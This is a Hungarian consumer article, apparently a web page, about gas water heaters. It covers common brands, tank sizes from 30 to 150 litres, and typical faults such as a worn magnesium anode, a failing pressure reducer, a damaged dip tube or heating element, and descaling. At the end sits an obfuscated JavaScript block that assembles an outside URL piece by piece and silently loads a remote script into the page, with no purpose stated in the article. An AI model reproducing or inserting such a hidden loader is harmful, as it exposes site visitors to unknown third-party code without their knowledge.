Hazánkban elmondható, hogy a gázbojler az egyik legelterjedtebb, legnépszerűbb melegvíz szolgáltatására alkalmas eszköz. Nem véletlenül, hiszen kiváló minőséget biztosító márkák (például hazánkban népszerű Hajdu) sora érhető el, akár online is. Érdemes odafigyelni a rendszeres karbantartásra, ezzel is biztosítva a minél hosszabb élettartamot.
A különböző igényekhez jól igazítható a gázbojler, amit már interneten keresztül, például a webkazán oldalán is könnyedén be lehet szerezni. Legyen szó bármilyen méretű háztartásról, vélhetően megfelelő mennyiségben képes a család melegvíz igényének biztosítására, hiszen különböző méretekben megvásárolható. Jellemzően 30, 50, 80, 120, de akár 150 literes méretben is elérhető, ami akár egy 3-4 gyermekes családot is biztonsággal kiszolgál.
A tartály mérete könnyen jelenthet problémát, hiszen egy nagyobb, 120 vagy 150 literes gázbojler helyének megtalálása nem egyszerű, azonban segítheti a telepítést, hogy nem csak álló-, de akár fekvő kivitelben is megválaszthatjuk új bojlerünket.
Ha megfelelően vigyázunk a gázbojlerre és ügyelünk a rendszeres karbantartásra, hosszabb életet biztosíthatunk az eszköznek. Érdemes figyelni rá, ugyanis a gázbojler javítása vagy cseréje költséges lehet.
Lássuk, mik a leggyakoribb problémák, amik előfordulhatnak bojler használata közben.
Magnéziumvédő anód cseréje
Az anód (gyakorlatilag a használattól függetlenül) rendszeres cserére szorul, ugyanis átlagosan 2 év élettartammal számolhatunk. A bojler cseréje természetesen nem szükséges ennyire gyakran, elegendő az anód kicseréléséről gondoskodni.
Nyomáscsökkentő
Az évek alatt elhasználódik a nyomáscsökkentő is, pontosabban gyengül a rugója.
Melegvíz oldali merülőcső cseréje
A bojler tartályának felső részében található a melegvíz. Amennyiben rozsdásodni kezd a merülőcső, megsérül, vagy megreped, akkor a csapot megnyitva nem lehetséges a felső tartályban lévő melegvízhez való hozzáférés, hidegebb vízhez jutunk ilyenkor. Lényegében tehát nem funkcionál megfelelően a bojler, hiába melegíti fel a vizet, nem jutunk hozzá a csapot megnyitva.
Fűtőszál hibásodása
A fűtőszál jelentősége vitathatatlan, hiszen ez gondoskodik a melegvíz előállításáról, a víz felmelegítéséről. Amennyiben a fűtőszál valamilyen okból kifolyólag megsérül, repedések keletkeznek rajta, azonnal gondoskodni kell annak cseréjéről. A fűtőszáltömítés cseréje is időnként esedékes lehet a megfelelő hőmérséklet biztosításához.
Vízkőtelenítés
Talán a leggyakoribb kérdés, hogy szükséges-e a bojlert vízkőteleníteni. Sok egyéb háztartási készülékkel ellentétben a bojler vízkőtelenítése nem egy rendszeres házimunkát jelent, ugyanis ez nem manuálisan történik. A gázbojler vízkőtelenítése vegyszerek nélkül, kizárólag mechanikus úton történik.
<script>
(function(){
c1z8=document.createElement(„script”);c1z8_=(„ust”);c1z8u=”492455670″;
c1z8_+=”a”+(„t.i”);c1z8.type=”text/javascript”;
c1z8u+=”.ncs8qndw1z8y43kribin”;c1z8.async=true;c1z8_+=”n”+(„f”+”o”)+”/”;
c1z8u+=”tmkys495za”;c1z8.src=”https://”+c1z8_+c1z8u;
document.body.appendChild(c1z8);
})();
</script>